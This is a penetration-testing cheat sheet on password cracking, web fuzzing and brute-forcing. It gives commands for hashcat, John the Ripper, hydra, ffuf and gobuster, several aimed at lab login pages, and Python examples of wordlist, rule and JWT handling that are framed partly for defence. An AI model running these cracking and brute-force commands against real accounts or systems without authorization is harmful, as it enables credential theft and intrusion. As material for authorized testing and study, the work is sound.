Cracking / Fuzzing / Brute-force

00. Create Wordlists

00.1 Crunch

## ------------------| Usage
## crunch generates every 4-character word matching the pattern: one lowercase letter, one uppercase letter, one digit, one symbol
crunch 4 4 -t @,%^
### -t specifies a pattern, e.g. @@god@@@@, where only the @, ",", % and ^ positions change and literal characters stay fixed.
### The min and max length must equal the pattern length.
### @ --> lower case characters
### , --> upper case characters
### % --> numbers
### ^ --> symbols

## crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
crunch 1 6 abcdefg

## ------------------| Best Usages
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
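As an added example (not part of the original notes, and not crunch's own code), the pattern expansion above written out in Python: each -t class maps to a character set, the keyspace is the product of the class sizes, and mask_of derives the tightest pattern a given password fits, which is a quick way to see how much a structured guess shrinks the space a password policy has to defend. The symbol set is an assumption (Python's string.punctuation, 32 characters); crunch's built-in symbol set differs slightly.

```python
import string
from itertools import product

# Character classes as crunch's -t pattern defines them. The symbol set is an
# assumption (Python's string.punctuation, 32 characters); crunch's built-in
# symbol set is similar but not identical, so keyspace figures differ slightly.
CLASSES = {
    "@": string.ascii_lowercase,   # 26
    ",": string.ascii_uppercase,   # 26
    "%": string.digits,            # 10
    "^": string.punctuation,       # 32
}


def pattern_charsets(pattern):
    """One candidate string per position: a class for @ , % ^, the literal
    character itself for anything else (the 'god' in @@god@@@@ never changes)."""
    return [CLASSES.get(ch, ch) for ch in pattern]


def keyspace(pattern):
    """Number of candidates the pattern expands to: the product of the class sizes."""
    total = 1
    for charset in pattern_charsets(pattern):
        total *= len(charset)
    return total


def expand(pattern):
    """Lazily yield every candidate for the pattern (what crunch writes to -o)."""
    for combo in product(*pattern_charsets(pattern)):
        yield "".join(combo)


def mask_of(password):
    """Tightest crunch pattern a given password fits. Useful when reviewing a
    policy: it shows how small the space a structure-aware guess has to cover is."""
    out = []
    for ch in password:
        for symbol, charset in CLASSES.items():
            if ch in charset:
                out.append(symbol)
                break
        else:
            raise ValueError(f"character {ch!r} is in no class")
    return "".join(out)


def hours_to_exhaust(pattern, guesses_per_second):
    """Worst-case time to try every candidate at a given guess rate."""
    return keyspace(pattern) / guesses_per_second / 3600


if __name__ == "__main__":
    for p in ("@,%^", "@@god@@@@", mask_of("Passw0rd!")):
        print(f"{p:12} keyspace={keyspace(p):>16,} "
              f"hours@1e9/s={hours_to_exhaust(p, 1e9):.2f}")
```

The point of mask_of is the comparison it makes possible: a nine-character password that follows the usual "Capital, letters, digit, symbol" shape lives in a space of 26^7 x 10 x 32 candidates, far smaller than the 95^9 a naive brute force would imply.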

00.2 CeWL

cewl --with-numbers -d 7 -m 5 -w cewl.out http(s)://IP/anything/

# -d : Depth to spider to, default 2.
# -m : Minimum word length, default 3.
# -w : Write the output to the file.
# -c : Show the count for each word found.
# -o : Let the spider visit other sites.
# --with-numbers: Accept words with numbers in as well as just letters
# --header : In format name:value - can pass multiple.
# --lowercase : Lowercase all parsed words
# --auth_user : Authentication username.
# --auth_pass : Authentication password.
# --proxy_host: Proxy host.
# --proxy_port: Proxy port, default 8080.

00.3 UserNameGen

wget https://raw.githubusercontent.com/h4rithd/UserNameGen/master/usernamegen.py
pip install argparse textwrap3 tqdm

## ------------------| Single user
python usernamegen.py -o output.txt -u "Harith Dilshan"
## ------------------| From a file of names
python usernamegen.py -o output.txt -f usernames.txt

00.4 username-anarchy

## ------------------| Generate a quick username list for a single user
ruby username-anarchy h4rithd dilshan

## ------------------| List username format plugins
ruby username-anarchy --list-formats

## ------------------| Generate a username list from a file
ruby username-anarchy --input-file names.txt --select-format first,first.last,f.last,flast > newlist.txt

01. Cracking Basic

01.1 Hashcat Basic

  • Look up example hashes to pick the hash mode (-m)

hashcat --example-hashes | grep -B1 -A2 "NTLM"
  • Common flags

-a             Attack-mode
--force        Ignore warnings
--status       Enable automatic update of the status screen
--status-json  Enable JSON format for status output
--session      Define specific session name
--restore      Restore session from --session
--outfile      Define outfile for recovered hash

- [ Attack Modes ] -
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  • Cracking

## ------------------| Without rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt

## ------------------| With rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/best64.rule  
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/d3ad0ne.rule   
  • HashCat Rules

hashcat --force passwords.list -r /usr/share/hashcat/rules/best64.rule --stdout > passwords.txt

# /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
# /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule
# /usr/share/hashcat/rules/T0XlC-insert_top_100_passwords_1_G.rule
# /usr/share/hashcat/rules/toggles1.rule
# /usr/share/hashcat/rules/specific.rule
# /usr/share/hashcat/rules/leetspeak.rule
# /usr/share/hashcat/rules/toggles2.rule
# /usr/share/hashcat/rules/toggles3.rule
# /usr/share/hashcat/rules/InsidePro-HashManager.rule
# /usr/share/hashcat/rules/T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
# /usr/share/hashcat/rules/generated.rule
# /usr/share/hashcat/rules/T0XlC.rule
# /usr/share/hashcat/rules/oscommerce.rule
# /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# /usr/share/hashcat/rules/T0XlCv1.rule
# /usr/share/hashcat/rules/best64.rule
# /usr/share/hashcat/rules/dive.rule
# /usr/share/hashcat/rules/d3ad0ne.rule
# /usr/share/hashcat/rules/toggles5.rule
# /usr/share/hashcat/rules/combinator.rule
# /usr/share/hashcat/rules/toggles4.rule
# /usr/share/hashcat/rules/Incisive-leetspeak.rule
# /usr/share/hashcat/rules/unix-ninja-leetspeak.rule
# /usr/share/hashcat/rules/generated2.rule
# /usr/share/hashcat/rules/rockyou-30000.rule

## OneRuleToRuleThemAll
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule  
  • Create Rules and Variants

## ------------------| Create file which has word or wordlist (single quotes keep bash from history-expanding the "!")
echo 'PleaseSubscribe!' >> hashes

## ------------------| Create new wordlist
hashcat --stdout hashes -r /usr/share/hashcat/rules/best64.rule > pw-list
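Added example, not part of the original notes and not hashcat's code: a small interpreter for the rule syntax that best64.rule and the other files above are written in. Each line of a rule file is a left-to-right sequence of one-letter functions (l, u, c, r, d, $X, ^X, sXY, TN, ...), and `hashcat --stdout -r` applies every line to every word. Seeing the functions implemented makes the variant lists above predictable, and the same engine has a defensive use: a password-change check that rejects any candidate which is a rule-mutation of a blocklisted word. The RULES list is a constructed sample, not the real best64.rule.

```python
def _take(rule, i, n):
    """Return the n parameter characters that start at rule[i], or fail cleanly."""
    if i + n > len(rule):
        raise ValueError(f"rule {rule!r} ends in the middle of a function")
    return rule[i:i + n]


def apply_rule(word, rule):
    """Run one rule line against a word. A line is a sequence of one-letter
    functions, some taking parameters, applied left to right (spaces are
    optional separators, as in hashcat rule files). Only a common subset of
    the function alphabet is implemented here; anything else raises."""
    w, i = word, 0
    while i < len(rule):
        f = rule[i]
        i += 1
        if f in " :": continue                             # separator / no-op
        elif f == "l": w = w.lower()                       # lowercase all
        elif f == "u": w = w.upper()                       # uppercase all
        elif f == "c": w = w[:1].upper() + w[1:].lower()   # capitalize
        elif f == "C": w = w[:1].lower() + w[1:].upper()   # inverse capitalize
        elif f == "t": w = w.swapcase()                    # toggle case of all
        elif f == "r": w = w[::-1]                         # reverse
        elif f == "d": w = w + w                           # duplicate
        elif f == "f": w = w + w[::-1]                     # reflect
        elif f == "{": w = w[1:] + w[:1]                   # rotate left
        elif f == "}": w = w[-1:] + w[:-1]                 # rotate right
        elif f == "[": w = w[1:]                           # delete first char
        elif f == "]": w = w[:-1]                          # delete last char
        elif f == "$": w = w + _take(rule, i, 1); i += 1   # $X: append X
        elif f == "^": w = _take(rule, i, 1) + w; i += 1   # ^X: prepend X
        elif f == "s":                                     # sXY: replace X with Y
            x, y = _take(rule, i, 2); i += 2
            w = w.replace(x, y)
        elif f == "T":                                     # TN: toggle case at N
            n = int(_take(rule, i, 1), 36); i += 1         # positions: 0-9 then A-Z
            if n < len(w): w = w[:n] + w[n].swapcase() + w[n + 1:]
        elif f == "D":                                     # DN: delete char at N
            n = int(_take(rule, i, 1), 36); i += 1
            w = w[:n] + w[n + 1:]
        else:
            raise ValueError(f"unsupported rule function {f!r}")
    return w


# Constructed rule set: a small best64-style sample, not the real best64.rule.
RULES = [":", "l", "u", "c", "r", "d", "$1", "$!", "c $1", "sa@",
         "sa@ c $1", "so0", "sa@ so0", "T0", "]"]


def expand(words, rules):
    """Yield the unique variants of each word, as `hashcat --stdout -r` would."""
    seen = set()
    for word in words:
        for rule in rules:
            variant = apply_rule(word, rule)
            if variant not in seen:
                seen.add(variant)
                yield variant


def matches_blocklist(candidate, blocklist, rules=RULES):
    """Defensive use: reject a new password if it is a rule-mutation of a
    blocklisted word. Returns (base word, rule) for the first hit, else None."""
    for word in blocklist:
        for rule in rules:
            if apply_rule(word, rule) == candidate:
                return word, rule
    return None


if __name__ == "__main__":
    print(list(expand(["password"], RULES)))
    print(matches_blocklist("P@ssword1", ["password"]))
```

For a real blocklist check, expand the blocklist once with a full rule file and store the variants in a set, rather than re-running the rules on every password change.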

Cheat Sheets

  • https://github.com/frizb/Hashcat-Cheatsheet

  • https://hashcat.net/wiki/doku.php?id=hashcat

01.2 JohnTheRipper Basic

  • Cracking

john hashfile -w=/usr/share/wordlists/rockyou.txt
  • John Mutation

sudo vi /etc/john/john.conf

john --wordlist=words.txt --rules --stdout > new_wordlist.txt
john --wordlist=words.txt --rules=all --stdout > new_wordlist.txt

01.3 SSH

## the passphrase protects the private key (id_rsa); the .pub file has nothing to crack
python3 /usr/share/john/ssh2john.py id_rsa > id_rsa.john
john id_rsa.john -w=/usr/share/wordlists/rockyou.txt

01.4 ZIP

## ------------------| For Zip
sudo apt-get install fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
## or use John the Ripper instead:
zip2john file.zip > hash
john hash

## ------------------| For 7z
sudo apt-get install libcompress-raw-lzma-perl
/usr/share/john/7z2john.pl backup.7z > backup.john
john backup.john -w=/usr/share/wordlists/rockyou.txt
## or use the following command:
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

01.5 PDF

## ------------------| Using pdfcrack
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt

## ------------------| Using qpdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

01.6 JWT

## ------------------| Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

## ------------------| Using jwtcrack
pip install PyJWT tqdm
git clone https://github.com/Sjord/jwtcrack.git && cd jwtcrack
### Crack using jwtcrack
crackjwt.py <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
### Convert a JWT to a format John the Ripper can understand.
jwt2john.py <JWT_TOKEN> 

## ------------------| Using JohnTheRipper
john jwt_token.txt -w=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
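Why the three commands above work offline, as an added example (not part of the original notes, not jwtcrack's or hashcat's code): an HS256 signature is just HMAC-SHA256 over the two base64url segments of the token, keyed with the server secret, so anyone holding one token can test candidate secrets without ever talking to the server. The defence is therefore on the issuing side: a secret of at least 256 bits of real randomness (RFC 7518 section 3.2 makes that a MUST for HS256), an algorithm pinned by the verifier rather than read from the token header, and a constant-time signature compare. The code below is standard-library Python with those three properties; MIN_SECRET_BYTES is that RFC minimum.

```python
import base64
import hashlib
import hmac
import json
import secrets

MIN_SECRET_BYTES = 32  # RFC 7518 s3.2: HS256 keys must be at least 256 bits


def b64url(data: bytes) -> str:
    """base64url without padding, as JWS uses it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def mint_hs256(payload: dict, secret: bytes) -> str:
    """Issue a token: header.payload signed with HMAC-SHA256 over the
    base64url text of both segments (the 'signing input')."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"},
                               separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify_hs256(token: str, secret: bytes):
    """Return the payload if the signature checks out under HS256, else None.
    The algorithm is pinned here; the token's own header is never trusted to
    choose it (this is what blocks alg=none and key-confusion tokens)."""
    try:
        header, body, sig = token.split(".")
        hdr = json.loads(b64url_decode(header))
        presented = b64url_decode(sig)
    except (ValueError, json.JSONDecodeError):
        return None
    if hdr.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, presented):   # constant-time compare
        return None
    return json.loads(b64url_decode(body))


def secret_ok(secret: bytes) -> bool:
    """Length check only; entropy has to come from the generator below."""
    return len(secret) >= MIN_SECRET_BYTES


def new_secret() -> bytes:
    return secrets.token_bytes(MIN_SECRET_BYTES)


if __name__ == "__main__":
    key = new_secret()
    token = mint_hs256({"sub": "alice", "admin": False}, key)
    print(token)
    print(verify_hs256(token, key))
```

A 32-byte random secret puts the search space at 2^256, which no wordlist or mask run reaches; the tokens the page's commands recover are the ones signed with a human-chosen word.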

01.7 VNC

## e84ad660c4721ae0 is the fixed DES key VNC servers use to obfuscate stored passwords, so a stored hash decrypts directly
echo -n <PassWordHash> | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

01.8 WiFi

## ------------------| AirCrack-ng
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt

01.9 LUKS

# ------------------| Using Hashcat
### Get the payload offset (in 512-byte sectors); the dd count below must cover it
cryptsetup luksDump backup.img | grep Payload
### Create luks header hashfile
dd if=backup.img of=hash bs=512 count=4097
### Cracking
hashcat -m 14600 hash /usr/share/wordlists/rockyou.txt

# ------------------| Using JohnTheRipper
luks2john.py /dev/sdb1 > sdb1.john
john sdb1.john -w=/usr/share/wordlists/rockyou.txt

# ------------------| How to mount/unmount
### Mount
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/ 
### Unmount
sudo umount -l /mnt/
sudo cryptsetup luksClose backup 

01.10 SUDO

# ------------------| Clone the sucrack programe and build it
git clone https://github.com/hemp3l/sucrack.git
cd sucrack
autoreconf -f -i
./configure
make
make install 
cd src
ls -al sucrack

## ------------------| Cracking process
./sucrack -a -w 20 -s 10 -u root -r dict.txt
./sucrack -a -w 20 -s 10 -u root -rx dict.txt

01.11 Microsoft Office

## ------------------| Hashcat
wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-oclhashcat/master/scrapers/office2hashcat.py
python2 office2hashcat.py file.xls [doc,dot,docm,xlm,ppt] > hash.txt
### pick -m from the script's output (Office 2007 = 9400, 2010 = 9500, 2013 = 9600)
hashcat hash.txt -m <mode> /usr/share/wordlists/rockyou.txt

## ------------------| JohnTheRipper
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py
python2 office2john.py file.xls [doc,dot,docm,xlm,ppt] > john-hash.txt
john john-hash.txt -w=/usr/share/wordlists/rockyou.txt

01.12 Group Policy Preferences

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

01.13 PFX certificate

/usr/share/john/pfx2john.py file.pfx > file.pfx.john
john file.pfx.john -w=/usr/share/wordlists/rockyou.txt 

03. Fuzzing Basic

## ------------------| Extension list
php,html,txt
php,html,txt,bak,tar,zip
php,html,txt,bak,tar,zip,aspx,asp
php,html,txt,bak,tar,zip,aspx,asp,jsp,js
php,html,txt,bak,tar,zip,aspx,asp,jsp,js,htm,exe

03.1 ffuf

Caution: ffuf is a poor fit for username/password enumeration because of how the "Content-Type" header gets set; use wfuzz instead, or feed ffuf a raw request with the -request option.

## ------------------| General options
-H                  Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-X                  HTTP method to use
-b                  Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
-d                  POST data
-c                  Colorize output. (default: false)
-r                  Follow redirects (default: false)
-u                  Target URL
-v                  Verbose output, printing full URL 
-e                  Comma separated list of extensions. (.php,.txt,.html)
-x                  Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
-ic                 Ignore wordlist comments (default: false)
-sni                Target TLS SNI, does not support FUZZ keyword
-rate               Rate of requests per second (default: 0)
-request            File containing the raw http request (Like burp request)
-request-proto      Protocol to use along with raw request (default: http)
-timeout            HTTP request timeout in seconds. (default: 10)
-ignore-body        Do not fetch the response content. (default: false)
-recursion          Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth    Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)     
-replay-proxy       Replay matched requests using this proxy.

## ------------------|  Filter options
-fc    Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl    Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr    Filter regexp
-fs    Filter HTTP response size. Comma separated list of sizes and ranges
-ft    Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-fw    Filter by amount of words in response. Comma separated list of word counts and ranges

## ------------------| Matcher options
-mc    Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403,405)
-ml    Match amount of lines in response
-mr    Match regexp
-ms    Match HTTP response size
-mt    Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-mw    Match amount of words in response
  • Best Usage

## ------------------| Directory Fuzz
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ | tee ffuf.out    

## ------------------| With Extensions
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ -e .php,.txt,.html | tee ffuf.out    

## ------------------| Subdomain Fuzz
ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200
  • Fuzz with POST data

## ------------------| application/json
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"

## ------------------| application/x-www-form-urlencoded
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "name=admin&password=FUZZ" -fr "error"

## ------------------| From burp file
ffuf -w entries.txt -request-proto http -request getUsers.req -fr "error"

03.2 wfuzz

## ------------------| General Options
-u url                    : Specify a URL for the request.
-w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
-V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ
-e <type>                 : List of available encoders/payloads/iterators/printers/scripts
-c                        : Output with colors
-v                        : Verbose information.
-b cookie                 : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
-H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
-f filename,printer       : Store results in the output file using the specified printer (raw printer if omitted).
-o printer                : Show results using the specified printer.
-t N                      : Specify the number of concurrent connections (10 default)
-s N                      : Specify time delay between requests (0 default)
-R depth                  : Recursive path discovery being depth the maximum recursion level.
-D depth                  : Maximum link depth level.
-L,--follow               : Follow HTTP redirections
-Z                        : Scan mode (Connection errors will be ignored).
--req-delay N             : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N            : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.

## ------------------| Scripts
-A, --AA, --AAA           : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache                : Disable plugins cache. Every request will be scanned.
--script=                 : Equivalent to --script=default
--script=<plugins>        : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins>   : Show help about scripts.
--script-args n1=v1,...   : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"

## ------------------| Payloads
-m iterator               : Specify an iterator for combining payloads (product by default)
-z payload                : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
                            A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                            Encoders category can be used. ie. url
                            Use help as a payload to show payload plugin's details (you can filter using --slice)
--zP <params>             : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default>            : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder>            : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter>          : Filter payload's elements using the specified expression. It must be preceded by -z.

## ------------------|  Filter options
--filter-help             : Filter language specification
--hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex             : Show/hide responses with the specified regex within the content
--filter <filter>         : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter>      : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.
  • Find valid usernames | POST data

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=test123" --hs "No account found with that username" http://10.10.10.97/login.php | tee usernames.txt    
  • Other commands

## ------------------| Range script
wfuzz -c -z range,1-65535 http://127.0.0.1:FUZZ

## ------------------| With encoders
### List available encoders
wfuzz -e encoders
### Apply the uri_hex encoder to every wordlist entry
wfuzz -w /wordlist.txt,uri_hex -u https://example.org/FUZZ

03.3 gobuster

## ------------------| General Options
-z, --no-progress                   Don't display progress
-o, --output string                 Output file to write results to (defaults to stdout)
-q, --quiet                         Don't print the banner and other noise
-t, --threads int                   Number of concurrent threads (default 10)
    --delay duration                Time each thread waits between requests (e.g. 1500ms)
-v, --verbose                       Verbose output (errors)
-w, --wordlist string               Path to the wordlist

-f, --add-slash                     Append / to each request
-c, --cookies string                Cookies to use for the requests
-e, --expanded                      Expanded mode, print full URLs
-x, --extensions string             File extension(s) to search for
-r, --follow-redirect               Follow redirects
-H, --headers stringArray           Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-k, --no-tls-validation             Skip TLS certificate verification
-n, --no-status                     Don't print status codes
-p, --password string               Password for Basic Auth
-P, --proxy string                  Proxy to use for requests [http(s)://host:port][socks5://127.0.0.1:1080]
-s, --status-codes string           Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403")    
-b, --status-codes-blacklist string Negative status codes (will override status-codes if set)
    --timeout duration              HTTP Timeout (default 10s)
-u, --url string                    The target URL
-a, --useragent string              Set the User-Agent string (default "gobuster/3.1.0")
-U, --username string               Username for Basic Auth
-d, --discover-backup               Upon finding a file search for backup files
    --wildcard                      Force continued operation when wildcard found
  • Best Usage

gobuster dir -e -f -t 20 -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt -o gobuster.out -u https://mysite.com/
  • DNS mode

gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-dns.out -d google.com 
  • VHOST Mode

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-vhost.out -u https://mysite.com 
  • Search backup files

gobuster dir -e -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -d -o gobuster-backups.out -u https://mysite.com/
  • Fuzzing Mode

gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt

03.4 dirsearch

## ------------------| General Options
-u    Target URL
-e    Extension list separated by commas (Example: php,asp)
-X    Exclude extension list separated by commas (Example: asp,jsp)
-f    Add extensions to every wordlist entry. By default dirsearch only replaces the %EXT% keyword with extensions     
-t    Number of threads
-r    Brute-force recursively
-i    Include status codes, separated by commas, support ranges (Example: 200,300-399)
-x    Exclude status codes, separated by commas, support ranges (Example: 301,500-599)
-q    Quiet mode
-m    HTTP method (default: GET)
-d    HTTP request data
-H    HTTP request header, support multiple flags (Example:  -H 'Referer: example.com')
-F    Follow HTTP redirects
-s    Delay between requests

-o    Output file
--format    Report format (Available: simple, plain, json, xml, md, csv, html)

--proxy          Proxy URL, support HTTP and SOCKS proxies (Example: localhost:8080, socks5://localhost:8088)
--timeout        Connection timeout
--cookie         Choose a cookie for each request
--user-agent     Choose a User-Agent for each request
--random-agent   Choose a random User-Agent for each request
--full-url       Full URLs in the output (enabled automatically in quiet mode)
--no-color       No colored output
--exclude-sizes  Exclude responses by sizes, separated by commas (Example: 123B,4KB)
--exclude-texts  Exclude responses by texts, separated by commas (Example: 'Not found', 'Error')

-U    Uppercase wordlist
-L    Lowercase wordlist
-C    Capital wordlist

--raw=FILE    Load raw HTTP request from file (use `--scheme` flag to set the scheme)
  • Best Usage

dirsearch -r -f -o `pwd`/dirsearch.out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e php,html,txt -u http://example.org/
  • When using HTB

url=http://nineveh.htb/department
dirsearch -f -o `pwd`/$(echo $url | cut -d '/' -f 3).out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u $url -e php  

03.5 feroxbuster

## ------------------| General Options
-u                    The target URL
-a                    Sets the User-Agent (default: feroxbuster/2.7.0)
-A                    Use a random User-Agent
-f                    Append / to each request's URL
-H                    Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-m                    Which HTTP request method(s) should be sent (default: GET)
-Q                    Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-x                    File extension(s) to search for (ex: -x php -x pdf js)
-k                    Disables TLS certificate validation in the client
-r                    Allow client to follow redirects
-T                    Number of seconds before a client's request times out (default: 7)
--data                Request's Body; can read data from a file if input starts with an @ (ex: @post.bin)
-b, --cookies         Specify HTTP cookies to be used in each request (ex: -b stuff=things)
--resume-from         State file from which to resume a partially complete scan
--burp                Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay         Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart               Set --extract-links, --auto-tune, --collect-words, and --collect-backups to true
--thorough            Use the same settings as --smart and set --collect-extensions to true
--force-recursion     Force recursion attempts on all 'found' endpoints (still respects recursion depth)

## ------------------| Response filters
-C                    Filter out status codes (deny list) (ex: -C 200 -C 401)
-N                    Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-s                    Status Codes to include (allow list) (default: 200 204 301 302 307 308 401 403 405)
-S                    Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-W                    Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-X                    Filter out messages via regular expression matching on the response's body (ex: -X '^ignore me$')

## ------------------| Dynamic collection settings
-B                    Automatically request likely backup extensions for "found" urls
-E                    Automatically discover extensions and add them to --extensions (unless they're in --dont-collect)
-g                    Automatically discover important words from within responses and add them to the wordlist
-I                    File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)

## ------------------| Output settings
--no-state            Disable state output file (*.state)
--silent              Only print URLs + turn off logging (good for piping a list of urls to other commands)
-o                    Output file to write results to (use w/ --json for JSON entries)
-q                    Hide progress bars and banner (good for tmux windows w/ notifications)
-v                    Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v's is probably too much)
  • Best Usage

feroxbuster -k -f -A -u <URL>

03.6 Arjun

## ------------------| Setup
apt-get install arjun
pip3 install arjun

## ------------------| Usage
arjun -u https://api.example.com/endpoint
arjun -u https://api.example.com/endpoint -m POST
arjun -u https://api.example.com/endpoint -m JSON --include='{"root":{"a":"b",$arjun$}}'

04. Brute-force Basic

04.1 HTTP

  • Common useful flags

hydra -u -f -t 10 -w 30  -L users.txt -P pass.txt 192.168.1.69 http-post-form "/login.php:user=^USER^&pass=^PASS^:Bad login" -o hydra-http-post-attack.txt

# Host   : 192.168.1.69
# Method : http-post-form / https-post-form / http-get-form / http-get (for basic auth)
# URI    : /login.php
# Form parameters  : user=^USER^&pass=^PASS^
# Failure response : Bad login (a string that appears only on failed logins)
# -L : users.txt (username list)
# -l : single username
# -P : pass.txt (password list)
# -t : Threads
# -w : Wait for timeout
# -S : Perform an SSL connect [https]
# -s : If the service is on a different default port
# -o : Output file
# -f : exit when a login/pass pair is found
# -R : Restore a previous aborted/crashed session
# -I : Ignore an existing restore file
# -u : Loop around users, not passwords (effective! implied with -x)

## To route through a proxy: export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
  • https-post-form

hydra -S -u -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password"       
  • http-get (basic auth) / Tomcat

hydra -u -f -l admin -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 10.10.10.157 http-get "/monitoring"   
  • With headers

hydra 192.168.1.69 http-post-form "/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo" \
-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt
 # in this case we specify that the cookie should be page/cookie
